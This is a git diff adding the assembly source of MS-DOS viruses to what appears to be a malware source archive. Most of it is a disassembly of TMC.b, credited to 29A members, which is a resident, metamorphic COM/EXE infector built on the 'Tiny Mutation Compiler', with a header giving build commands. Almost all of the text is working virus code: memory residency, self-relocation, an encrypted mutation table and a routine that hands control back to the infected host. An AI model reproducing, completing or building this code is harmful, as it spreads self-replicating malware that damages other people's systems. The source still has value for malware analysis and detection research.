+ db 05h ; Five bytes instruction
+
+ pop cs:[1234h] ; Load 16-bit immediate from stack
+
+ db 11101101b ; Data reference
+ dw 13aah ; Pointer to imm16
+ db 01h ; One byte instruction
+
+ pop es ; Load ES from stack
+
+ db 01h ; One byte instruction
+
+ pop ds ; Load DS from stack
+
+ db 01h ; One byte instruction
+
+ pop bp ; Load BP from stack
+
+ db 01h ; One byte instruction
+
+ pop di ; Load DI from stack
+
+ db 01h ; One byte instruction
+
+ pop si ; Load SI from stack
+
+ db 01h ; One byte instruction
+
+ pop dx ; Load DX from stack
+
+ db 01h ; One byte instruction
+
+ pop cx ; Load CX from stack
+
+ db 01h ; One byte instruction
+
+ pop bx ; Load BX from stack
+
+ db 01h ; One byte instruction
+
+ pop ax ; Load AX from stack
+
+ db 05h ; Five bytes instruction
+
+ jmp cs:[1234h]
+
+ db 11101101b ; Data reference
+ dw 13aah ; Pointer to imm16
+ db 11101111b ; End of block
+int21_addr db 11101110b ; Beginning of block
+ dw 0c9h ; Block identification of int21_addr
+ db 04h+10h ; Four bytes data
+ dd 00h ; Address of interrupt 21h
+ db 11101111b ; End of block
+int21_seg db 11101110b ; Beginning of block
+ dw
13a2h ; Block identification of int24_seg
+ db 02h+10h ; Two bytes data
+ dw 00h ; Segment of interrupt 24h
+ db 11101111b ; End of block
+int21_off db 11101110b ; Beginning of block
+ dw 13a3h ; Block identification of int24_off
+ db 02h+10h ; Two bytes data
+ dw 00h ; Offset of interrupt 24h
+ db 11101111b ; End of block
+imm16 db 11101110b ; Beginning of block
+ dw 13aah ; Block identification of imm16
+ db 02h+10h ; Two bytes data
+ dw 00h ; 16-bit immediate
+ db 11101111b ; End of block
+exe_header db 11101110b ; Beginning of block
+ dw 138fh ; Block identification of exe_header
+ db 18h+10h ; Twenty-four bytes data
+ db 18h dup(00h) ; EXE header
+ db 11101111b ; End of block
+timer_ticks db 11101110b ; Beginning of block
+ dw 13adh ; Block identification of timer_ticks
+ db 02h+10h ; Two bytes data
+ dw 00h ; Timer ticks since midnight
+ db 11101111b ; End of block
+file_time db 11101110b ; Beginning of block
+ dw 12ch ; Block identification of file_time
+ db 02h+10h ; Two bytes data
+ dw 00h ; File time
+ db 11101111b ; End of block
+file_date db 11101110b ; Beginning of block
+ dw 12dh ; Block identification of file_date
+ db 02h+10h ; Two bytes data
+ dw 00h ; File date
+ db 11101111b ; End of block
+progra_seg db 11101110b ; Beginning of block
+ dw 139fh ; Block identification of progra_seg
+ db 02h+10h ; Two bytes data
+ dw 00h ; Segment of PSP for current process
+ db 11101111b ; End of block
+file_handle db 11101110b ; Beginning of block
+ dw 139dh ; Block identification of file_handle
+ db 02h+10h ; Two bytes data
+ dw 00h ; File handle
+ db 11101111b ; End of block
+filename db 11101110b ; Beginning of block
+ dw 139eh ; Block identification of filename
+ db (filena_end-filena_begin)+10h
+filena_begin:
+ db 07h dup(00h,01h,02h,03h,04h,05h,06h,07h,08h,09h,0ah)
+filena_end:
+ db 11101111b ; End of block
+message db 11101110b ; Beginning of block
+ dw 2328h ; Block identification of message
+ db (message_end-messag_begin)+10h
+messag_begin db 0dh,0ah
+
db 0dh,0ah
+ db ' TMC 1.0 by Ender ',0dh,0ah
+ db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah
+ db 'Dis is level 6*9.',0dh,0ah
+ db 'Greetings to virus makers: Dark Avenger, Vyvojar, SVL, Hell Angel',0dh,0ah
+ db 'Personal greetings: K. K., Dark Punisher',0dh,0ah
+ db 0dh,0ah
+message_end:
+ db 11101111b ; End of block
+ db 00h ; End of table
+table_end:
+code_end:
+
+end code_begin
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.tmc_b.asm b/MSDOS/Virus.MSDOS.Unknown.tmc_b.asm
new file mode 100644
index 00000000..da15888b
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tmc_b.asm
@@ -0,0 +1,4284 @@
+comment *
+ TMC.b
+ Disassembly by
+ Super/29A and Darkman/29A
+
+
+
+ TMC.b is a 4780 bytes resident appending COM and EXE virus. Infects at load
+ and/or execute program, rename file and open file. TMC.b has an error
+ handler, retro structures and is metamorphic in file and memory using Tiny
+ Mutation Compiler v 1.00 [TMC].
+
+ To compile TMC.b with Turbo Assembler v 5.0 type:
+ TASM /M TMC_B.ASM
+ TLINK /x TMC_B.OBJ
+ EXE2BIN TMC_B.EXE TMC_B.COM
+*
+
+.model tiny
+.code
+
+code_begin:
+ mov bp,100h ; BP = delta offset
+
+ cld ; Clear direction flag
+ mov ax,ds ; AX = segment of PSP for current ...
+ mov [bp+program_seg],ax ; Store segment of PSP for current...
+
+ dec ax ; AX = segment of current Memory C...
+ mov ds,ax ; DS = segment of current Memory C...
+ mov ax,ds:[03h] ; AX = size of memory block in par...
+
+ cmp ax,1900h ; Insufficient memory?
+ jae resize_mem ; Above or equal? Jump to resize_mem
+
+ jmp terminate
+resize_mem:
+ push cs ; Save CS at stack
+ pop ds ; Load DS from stack (CS)
+
+ mov [bp+mcb_size_],ax ; Store size of memory block in p...
+
+ mov bx,[bp+new_mcb_size]
+ mov ah,4ah ; Resize memory block
+ int 21h
+ jnc allocate_mem ; No error? Jump to allocate_mem
+
+ jmp terminate
+allocate_mem:
+ mov ah,48h ; Allocate memory
+
+ mov bx,[bp+mcb_size_] ; BX = size of memory block in par...
+ sub bx,[bp+new_mcb_size]
+ dec bx ; BX = number of paragraphs to all...
+ cmp bx,0c00h ; Insufficient memory?
+ jae allocat_mem ; Above or equal? Jump to allocat_...
+
+ jmp terminate
+allocat_mem:
+ int 21h
+ jnc initiali_tmc ; No error? Jump to initiali_tmc
+
+ jmp terminate
+initiali_tmc:
+ mov es,ax ; ES = segment of allocated memory
+ mov es:[01h],0deadh ; Store 16-bit random number
+ mov word ptr es:[0ch],00h
+ mov es:[04h],1000h ; Store offset of block information
+ mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i...
+ mov es:[08h],3000h ; Store offset of data information
+
+ lea si,[bp+tmc_table] ; SI = offset of tmc_table
+
+ push si ; Save SI at stack
+
+ mov bx,4000h ; BX = offset of next virus genera...
+
+ jmp initial_tmc
+initial_tmc:
+ mov di,10h ; DI = offset of table of blocks
+ xor ax,ax ; Zero AX
+
+ jmp tmc_ini_loop
+tmc_ini_loop:
+ add si,ax ; SI = offset of block or instruct...
+ call decrypt_byte
+ or al,al ; End of table?
+ jz calc_blocks ; Zero? Jump to calc_blocks
+ nop
+ nop
+ nop
+
+ cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
+ jae exam_block ; Above or equal? Jump to exam_block
+ nop
+ nop
+ nop
+
+ cmp al,10h ; Data?
+ jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_...
+ nop
+ nop
+ nop
+
+ sub al,10h ; AL = length of data
+
+ jmp tmc_ini_loop
+exam_block:
+ cmp al,11101111b ; End of block?
+ jne exam_block_ ; Not equal? Jump to exam_block_
+ nop
+ nop
+ nop
+
+ mov al,00h ; Don't add anything to offset wit...
+
+ jmp tmc_ini_loop
+exam_block_:
+ cmp al,11101110b ; Beginning of block?
+ jne next_byte ; Not equal? Jump to next_byte
+ nop
+ nop
+ nop
+
+ mov ax,si ; AX = offset of block identification
+ dec ax ; AX = offset of block within table
+ stosw ; Store offset of block within table
+
+ mov ax,0ffffh ; Block is still in one part
+ stosw ; Store block identification
+
+ mov ax,02h ; Add two to offset within table
+
+ jmp tmc_ini_loop
+next_byte:
+ mov al,02h ; Add two to offset within table
+
+ jmp tmc_ini_loop
+calc_blocks:
+ lea ax,[di-10h] ; AX = number of blocks multiplied...
+ shr ax,01h ; Divide number of blocks by two
+ shr ax,01h ; Divide number of blocks by two
+ mov es:[0ah],ax ; Store number of blocks
+
+ xor ax,ax ; End of table
+ stosw ; Store end of table
+
+ mov di,10h ; DI = offset of table of blocks
+ mov si,es:[di] ; SI = offset of block within table
+
+ jmp exam_bloc
+split_block:
+ push bp ; Save BP at stack
+ mov bp,es:[0ah] ; BP = number of blocks
+ call rnd_in_range
+ pop bp ; Load BP from stack
+
+ shl ax,01h ; Multiply random number with two
+ shl ax,01h ; Multiply random number with two
+ add ax,10h ; Add ten to random number
+
+ mov di,ax ; DI = random offset within table
+
+ jmp exam_nxt_blo
+exam_nxt_blo:
+ add di,04h ; DI = offset of next offset withi...
+
+ mov si,es:[di] ; SI = offset of next block within...
+ or si,si ; End of table?
+ jnz exam_block__ ; Not zero? Jump to exam_block__
+ nop
+ nop
+ nop
+
+ mov di,10h ; DI = offset of table of blocks
+ mov si,es:[di] ; SI = offset of block within table
+
+ jmp exam_block__
+exam_block__:
+ push ax ; Save AX at stack
+ call decrypt_byte
+ dec si ; Decrease offset of block within ...
+ cmp al,11101111b ; End of block?
+ pop ax ; Load AX from stack
+ jne exam_bloc ; Not equal? Jump to exam_bloc
+ nop
+ nop
+ nop
+
+ cmp di,ax ; End of table of blocks?
+ jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo
+ nop
+ nop
+ nop
+
+ jmp exam_tbl_inf
+exam_bloc:
+ mov ax,es:[di+02h] ; AX = block information
+
+ cmp ax,0ffffh ; Block is still in one part?
+ je exam_bloc_ ; Equal? Jump to exam_bloc_
+ nop
+ nop
+ nop
+
+ push di ; Save DI at stack
+ mov di,ax ; DI = offset of end of first part...
+ mov al,11101001b ; JMP imm16 (opcode 0e9h)
+ stosb ; Store JMP imm16
+
+ mov ax,bx ; AX = offset within next virus ge...
+ dec ax ; Decrease offset within next viru...
+ dec ax ; Decrease offset within next viru...
+ sub ax,di ; Subtract offset of end of first ...
+ stosw ; Store 16-bit immediate + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_bloc_: + call decrypt_byte + + cmp al,11101111b ; End of block? + jne exam_bloc__ ; Not equal? Jump to exam_bloc__ + + jmp end_of_block +exam_bloc__: + cmp al,10h ; Data; CALL; JMP; Data reference...? + ja exam_bloc___ ; Above? Jump to exam_bloc___ + nop + nop + nop + + push ax bp ; Save registers at stack + mov bp,[bp+probability] ; BP = probability + call rnd_in_range + or ax,ax ; Split up block? + pop bp ax ; Load registers from stack + jz split_block ; Zero? Jump to split_block_ + nop + nop + nop + + jmp exam_bloc___ +exam_bloc___: + cmp al,11101111b ; End of block? + jne exam_blo ; Not equal? Jump to exam_blo + + jmp end_of_block +exam_blo: + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + jae exam_data ; Above or equal? Jump to exam_data + nop + nop + nop + + cmp al,10h ; Data? + jbe sto_instruct ; Below or equal? Jump to sto_inst... + nop + nop + nop + + sub al,10h ; AL = length of data + + jmp sto_instruct +sto_instruct: + xor cx,cx ; Zero CX + mov cl,al ; CL = length of instruction + + push di ; Save DI at stack + mov di,bx ; DI = offset within next virus ge... + + jmp sto_ins_loop +sto_ins_loop: + call decrypt_byte + stosb ; Store byte of instruction + + dec cx ; Decrease counter + jnz sto_ins_loop ; Not zero? Jump to sto_ins_loop + nop + nop + nop + + mov bx,di ; BX = offset within next virus ge... + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_data: + cmp al,11101101b ; Data reference? + jne exam_blo_ ; Not equal? Jump to exam_blo_ + nop + nop + nop + + push di ; Save DI at stack + mov di,es:[08h] ; DI = offset within data information + + mov ax,bx ; AX = offset within next virus ge... + dec ax ; Decrease offset within next viru... + dec ax ; Decrease offset within next viru... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[08h],di ; Store offset within data informa... 
+ pop di ; Load DI from stack + + jmp exam_bloc_ +exam_blo_: + cmp al,11101110b ; Beginning of block? + jne sto_call_jmp ; Not equal? Jump to sto_call_jmp + nop + nop + nop + + push di ; Save DI at stack + mov di,es:[04h] ; DI = offset within block informa... + + mov ax,bx ; AX = offset within next virus ge... + stosw ; Store offset within next virus ge... + + call decrypt_id + stosw ; Store block identification + + mov es:[04h],di ; Store offset within block inform... + + cmp ax,4c5h ; Block identification of tmc_table? + jne exam_message ; Not equal? Jump to exam_message + nop + nop + nop + + push si ; Save SI at stack + mov di,bx ; DI = offset within next virus ge... + lea si,[bp+tmc_table] ; SI = offset of tmc_table + mov cx,(table_end-table_begin) + rep movsb ; Move table to top of memory + + mov bx,di ; BX = offset within next virus ge... + pop si ; Load SI from stack + + jmp examine_next +exam_message: + cmp ax,2328h ; Block identification of message? + jne exam_probabi ; Not equal? Jump to exam_probabi + nop + nop + nop + + mov ax,14h ; Probability of including message + cmp [bp+probability],ax ; Include message? + jae examine_next ; Above or equal? Jump to examine_... + nop + nop + nop + + call decrypt_byte + sub al,10h ; AL = length of message + mov ah,00h ; Zero AH + add si,ax ; SI = offset of end of message + + jmp examine_next +exam_probabi: + cmp ax,0bech ; Block identification of probabi...? + jne examine_next ; Not equal? Jump to examine_next + nop + nop + nop + + mov ax,[bp+probability] ; AX = probability + dec ax ; Decrease probability + cmp ax,05h ; Probability too small? + jae store_probab ; Above or equal? Jump to store_pr... + nop + nop + nop + + mov ax,64h ; Reset probability + + jmp store_probab +store_probab: + mov es:[bx],ax ; Store probability + + add bx,02h ; Add two to offset within next vi... + add si,03h ; SI = offset of beginning of next... 
+ + jmp examine_next +examine_next: + pop di ; Load DI from stack + + call decrypt_byte + + jmp exam_bloc___ +sto_call_jmp: + push ax di ; Save registers at stack + mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... + mov ax,bx ; AX = offset within next virus ge... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[06h],di ; Store offset within CALL; JMP; J... + pop di ax ; Load registers from stack + + mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... + + add bx,03h ; Add three to offset within next ... + + cmp al,11110000b ; Jump condition? + jae jcc_imm8 ; Above or equal? Jump to jcc_imm8 + + jmp exam_bloc_ +jcc_imm8: + inc bx ; Increase offset within next viru... + inc bx ; Increase offset within next viru... + + jmp exam_bloc_ +split_block_: + mov es:[di+02h],bx ; Store offset within next virus g... + + add bx,03h ; Add three to offset within next ... + + jmp end_of_block +end_of_block: + dec si ; Decrease offset of block within ... + + mov es:[di],si ; Store offset of block within table + + jmp split_block +exam_tbl_inf: + cmp word ptr es:[0ch],00h + jne correct_i16 ; End of second table? Jump to cor... + nop + nop + nop + + pop si ; Load SI from stack + + mov es:[0ch],bx ; Store offset within next virus g... + + add si,(second_table-first_table) + + jmp initial_tmc +correct_i16: + push es ; Save ES at stack + pop ds ; Load DS from stack (ES) + + sub bx,4000h ; Subtract offset of next virus ge... + mov ds:[0eh],bx ; Store length of virus + + mov si,2000h ; SI = offset of CALL; JMP; Jcc im... + mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... + sub cx,si ; Subtract offset of CALL; JMP; Jc... + + shr cx,01h ; Divide number of CALL imm16; JMP... + shr cx,01h ; Divide number of CALL imm16; JMP... + + jmp jmp_call_loo +jmp_call_loo: + lodsw ; AX = offset of block within data... + push ax ; Save AX at stack + + lodsw ; AX = offset of block within data... 
+ + push cx si ; Save registers at stack + mov si,1000h ; SI = offset of block information + mov cx,ds:[04h] ; CX = offset of end of block info... + sub cx,si ; Subtract offset of block informa... + + shr cx,01h ; Divide number of block by two + shr cx,01h ; Divide number of block by two + + jmp find_block +find_block: + cmp ax,[si+02h] ; Found block? + je found_block ; Equal? Jump to found_block + nop + nop + nop + + add si,04h ; SI = offset of next block in table + + dec cx ; Decrease counter + jnz find_block ; Not zero? Jump to find_block + nop + nop + nop +found_block: + mov dx,[si] ; DX = offset of block + + pop si cx ; Load registers from stack + pop bx ; Load BX from stack (AX) + + mov al,[bx] ; AL = first byte of instruction + cmp al,11110000b ; Jump condition? + jb sto_call_jm ; Below? Jump to sto_call_jm + nop + nop + nop + + sub byte ptr [bx],10000000b + + inc bx ; BX = offset of 8-bit immediate + + push dx ; Save DX at stack + sub dx,bx ; Subtract offset within next viru... + dec dx ; Decrease 8-bit immediate + + cmp dx,7fh ; 8-bit immediate out of range? + jg invert_jcc ; Greater? Jump to invert_jcc + nop + nop + nop + + cmp dx,0ff80h ; 8-bit immediate out of range? + jl invert_jcc ; Less? Jump to invert_jcc + nop + nop + nop + + mov [bx],dl ; Store 8-bit immediate + inc bx ; BX = offset of end of Jcc imm8 + + mov [bx],1001000010010000b + mov byte ptr [bx+02h],10010000b + pop dx ; Load DX from stack + + jmp correct_i16_ +invert_jcc: + pop dx ; Load DX from stack + + dec bx ; BX = offset of Jcc imm8 + xor byte ptr [bx],00000001b + + inc bx ; BX = offset of 8-bit immediate + mov byte ptr [bx],03h ; Store 8-bit immediate + + inc bx ; BX = offset of JMP imm16 + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + jmp sto_call_jm +sto_call_jm: + mov [bx],al ; Store CALL imm16; JMP imm16 + + inc bx ; BX = offset of 16-bit immediate + sub dx,bx ; Subtract offset within next viru... 
+ + dec dx ; Decrease 16-bit immediate + dec dx ; Decrease 16-bit immediate + + mov [bx],dx ; Store 16-bit immediate + + jmp correct_i16_ +correct_i16_: + dec cx ; Decrease counter + jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo + nop + nop + nop + + mov si,3000h ; SI = offset of data information + mov cx,ds:[08h] ; CX = offset of end of data infor... + sub cx,si ; Subtract offset of data informat... + + shr cx,01h ; Divide number of data references... + shr cx,01h ; Divide number of data references... + + jmp data_ref_loo +data_ref_loo: + lodsw ; AX = offset of block within data... + push ax ; Save AX at stack + + lodsw ; AX = offset of block within data... + + push cx si ; Save registers at stack + mov si,1000h ; SI = offset of block information + mov cx,ds:[04h] ; CX = offset of end of block info... + sub cx,si ; Subtract offset of block informa... + + shr cx,01h ; Divide number of block by two + shr cx,01h ; Divide number of block by two + + jmp find_block_ +find_block_: + cmp ax,[si+02h] ; Found block? + je found_block_ ; Equal? Jump to found_block_ + nop + nop + nop + + add si,04h ; SI = offset of next block in table + + dec cx ; Decrease counter + jnz find_block_ ; Not zero? Jump to find_block_ + nop + nop + nop +found_block_: + mov ax,[si] ; AX = offset of block + pop si cx ; Load registers from stack + pop bx ; Load BX from stack (AX) + + sub ax,4000h ; Subtract offset of next virus ge... + mov [bx],ax ; Store 16-bit immediate + + dec cx ; Decrease counter + jnz data_ref_loo ; Not zero? Jump to data_ref_loo + nop + nop + nop + + jmp restore_code +restore_code: + mov ax,[bp+program_seg] ; AX = segment of PSP for current ... + + mov cx,[bp+initial_ss] ; CX = initial SS relative to star... + add cx,10h ; Add ten to initial SS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_sp] ; Save initial SP at stack + + mov cx,[bp+initial_cs] ; CX = initial CS relative to star... 
+ add cx,10h ; Add ten to initial CS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_ip] ; Save initial IP at stack + + push ax ; Save segment of PSP for current ... + push [bp+mcb_size] ; Save size of memory block in par... + push ds ; Save DS at stack + + mov cl,00h ; COM executable + cmp [bp+executa_stat],cl + jne move_virus ; COM executable? Jump to move_virus + nop + nop + nop + + lea si,[bp+origin_code] ; SI = offset of origin_code + + mov ax,cs:[si] ; AX = first two bytes of original... + mov cs:[100h],ax ; Store first two bytes of origina... + + mov al,cs:[si+02h] ; AL = last byte of original code ... + mov cs:[100h+02h],al ; Store last byte of original code... + + jmp move_virus + + mov ax,[bp+program_seg] ; AX = segment of PSP for current ... + + mov cx,[bp+initial_ss] ; CX = initial SS relative to star... + add cx,10h ; Add ten to initial SS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_sp] ; Save initial SP at stack + + mov cx,[bp+initial_cs] ; CX = initial CS relative to star... + add cx,10h ; Add ten to initial CS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+incorrect_ip] ; Save incorrect IP at stack + + push ax ; Save segment of PSP for current ... + push [bp+mcb_size] ; Save size of memory block in par... + push ds ; Save DS at stack + + mov cl,00h ; COM executable + cmp [bp+executa_stat],cl + jne move_virus ; COM executable? Jump to move_virus + nop + nop + nop + + lea si,[bp+origin_code] ; SI = offset of origin_code + + mov ax,cs:[si] ; AX = first two bytes of original... + mov cs:[100h],ax ; Store first two bytes of origina... + + mov al,cs:[si+02h] ; AL = last byte of original code ... + mov cs:[100h+02h],al ; Store last byte of original code... + + jmp move_virus +move_virus: + xor ax,ax ; Zero AX + mov ds,ax ; DS = segment of DOS communicatio... 
+ + cmp byte ptr ds:[501h],10h + jne move_virus_ ; Already resident? Jump to move_v... + + jmp virus_exit +move_virus_: + mov byte ptr ds:[501h],10h + + push es ; Save ES at stack + pop ds ; Load DS from stack (ES) + + mov ax,ds:[0ch] ; AX = offset within next virus ge... + sub ax,4000h ; Subtract offset of next virus ge... + mov [bp+vir_exit_off],ax + + mov cx,ds:[0eh] ; CX = length of virus + mov [bp+virus_length],cx + + mov si,4000h ; SI = offset of next virus genera... + xor di,di ; Zero DI + rep movsb ; Move virus to top of memory + + mov cl,04h ; Divide by paragraphs + shr di,cl ; DI = length of next virus genera... + inc di ; Increase length of next virus ge... + + mov bx,[bp+mcb_size_] ; BX = size of memory block in par... + sub bx,[bp+new_mcb_size] + sub bx,di ; Subtract length of next virus ge... + + dec bx ; Decrease new size in paragraphs + dec bx ; Decrease new size in paragraphs + + cmp bx,di ; Insufficient memory? + jae resize_mem_ ; Above or equal? Jump to resize_mem_ + + jmp virus_exit +resize_mem_: + mov ah,4ah ; Resize memory block + int 21h + jnc allocat_mem_ ; No error? Jump to allocat_mem_ + + jmp virus_exit +allocat_mem_: + mov bx,di ; BX = number of paragraphs to all... + mov ah,48h ; Allocate memory + int 21h + jc virus_exit ; Error? Jump to virus_exit + nop + nop + nop + + push ax ; Save AX at stack + dec ax ; AX = segment of current Memory C... + mov es,ax ; ES = segment of current Memory C... + mov word ptr es:[01h],08h + pop es ; Load ES from stack (AX) + + mov cx,[bp+virus_length] + xor si,si ; Zero SI + xor di,di ; Zero DI + rep movsb ; Move virus to top of memory + + push es ; Save ES at stack + push word ptr [bp+vir_exit_off] + + mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... 
+ mov ah,byte ptr [bp+sliding_key] + + retf ; Return far +terminate: + mov ax,4c00h ; Terminate with return code + int 21h + +get_rnd_num proc near ; Get 16-bit random number + push cx ; Save CX at stack + in al,40h ; AL = 8-bit random number + mov ah,al ; AH = 8-bit random number + in al,40h ; AL = 8-bit random number + + xor ax,es:[01h] ; AX = 16-bit random number + + mov cl,ah ; CL = high-order byte of 16-bit r... + rol ax,cl ; AX = 16-bit random number + + mov es:[01h],ax ; Store 16-bit random number + pop cx ; Load CX from stack + + ret ; Return + endp + +rnd_in_range proc near ; Random number within range + or bp,bp ; Zero BP? + jz zero_range ; Zero? Jump to zero_range + nop + nop + nop + + push dx ; Save DX at stack + call get_rnd_num + + xor dx,dx ; Zero DX + div bp ; DX = random number within range + + xchg ax,dx ; AX = random number within range + pop dx ; Load DX from stack + + ret ; Return +zero_range: + xor ax,ax ; AX = random number within range + + ret ; Return + endp + +decrypt_byte proc near ; Decrypt byte of table + mov [bp+ah_],ah ; Store AH + + mov ax,si ; AX = offset within table + sub ax,bp ; Subtract delta offset from offse... + sub ax,offset tmc_table ; Subtract offset of tmc_table fro... + + mul word ptr [bp+sliding_key] + add al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... + + xor al,[si] ; AL = byte of decrypted table + + mov ah,[bp+ah_] ; AH = stored AH + + inc si ; Increase offset within table + + ret ; Return + endp + +decrypt_id proc near ; Decrypt block identification in ... + call decrypt_byte + mov ah,al ; AL = byte of decrypted table + + call decrypt_byte + xchg al,ah ; AL = byte of decrypted table + + ret ; Return + endp +virus_exit: + pop es ; Load ES from stack + + mov ah,49h ; Free memory + int 21h + pop bx ; Load BX from stack + + pop ax ; Load AX from stack + mov ds,ax ; DS = segment of PSP for current ... + mov es,ax ; DS = segment of PSP for current ... 
+ + mov ah,4ah ; Resize memory block + int 21h + + lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32 + + pop ax ; Load AX from stack (initial IP) + mov cs:[bx+01h],ax ; Store initial IP + + pop ax ; Load AX from stack (initial CS ...) + mov cs:[bx+03h],ax ; Store initial CS relative to sta... + + pop ax ; Load AX from stack (initial SP) + pop ss ; Load SS from stack (initial SS ...) + + mov sp,ax ; SP = stack pointer + + jmp jmp_imm32 + +jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah) + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; Pointer to virus in top of memory +ah_ db 00h ; Accumulator register (high-orde...) +probability dw 32h ; Probability +crypt_key db 00h ; 8-bit encryption/decryption key +sliding_key dw 00h ; 8-bit sliding encryption/decrypt... +executa_stat db 00h ; Executable status +origin_code db 11000011b,02h dup(00h) +initial_cs dw 0fff0h ; Initial CS relative to start of ... +initial_ss dw 0fff0h ; Initial SS relative to start of ... +initial_ip dw 100h ; Initial IP +incorrect_ip dw 100h ; Incorrect IP +initial_sp dw 0fffeh ; Initial SP +new_mcb_size dw 1000h ; New size in paragraphs +mcb_size dw 0ffffh ; Size of memory block in paragraphs +mcb_size_ dw 00h ; Size of memory block in paragraphs +program_seg dw 00h ; Segment of PSP for current process +virus_length dw 00h ; Length of virus +vir_exit_off dw 00h ; Offset of virus_exit +table_begin: +first_table: +tmc_table db 11101111b ; End of block + db 11101110b ; Beginning of block + dw 00h ; Block identification of tmc_table + db 03h ; Three bytes instruction + + mov bp,1234h ; BP = delta offset + + db 01h ; One byte instruction + + cld ; Clear direction flag + + db 02h ; Two bytes instruction + + mov ax,ds ; AX = segment of PSP for current ... + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store segment of PSP for current... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 01h ; One byte instruction + + dec ax ; AX = segment of current Memory C... 
+ + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of current Memory C... + + db 03h ; Three bytes instruction + + mov ax,ds:[03h] ; AX = size of memory block in par... + + db 03h ; Three bytes instruction + + cmp ax,1900h ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store size of memory block in p... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = new size in paragraphs + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + mov ah,48h ; Allocate memory + + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = size of memory block in par... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + sub bx,[bp+1234h] ; Subtract new size in paragraphs ... + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 01h ; One byte instruction + + dec bx ; BX = number of paragraphs to all... + + db 04h ; Four bytes instruction + + cmp bx,0c00h ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? 
Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + mov es,ax ; ES = segment of allocated memory + + db 07h ; Seven bytes instruction + + mov es:[01h],0deadh ; Store 16-bit random number + + db 07h ; Seven bytes instruction + + mov word ptr es:[0ch],00h + + db 07h ; Seven bytes instruction + + mov es:[04h],1000h ; Store offset of block information + + db 07h ; Seven bytes instruction + + mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i... + + db 07h ; Seven bytes instruction + + mov es:[08h],3000h ; Store offset of data information + + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov bx,4000h ; BX = offset of next virus genera... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fa0h ; Pointer to initial_tmc + db 11101111b ; End of block +initial_tmc_ db 11101110b ; Beginning of block + dw 0fa0h ; Block identification of initial_tmc_ + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +tmc_ini_loo db 11101110b ; Beginning of block + dw 0bb8h ; Block identification of tmc_ini_... + db 02h ; Two bytes instruction + + add si,ax ; SI = offset of block or instruct... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + or al,al ; End of table? + + db 01110100b+10000000b ; Zero? Jump to calc_blocks_ + dw 0bbch ; Pointer to calc_blocks_ + db 02h ; Two bytes instruction + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + + db 01110011b+10000000b ; Above or equal? 
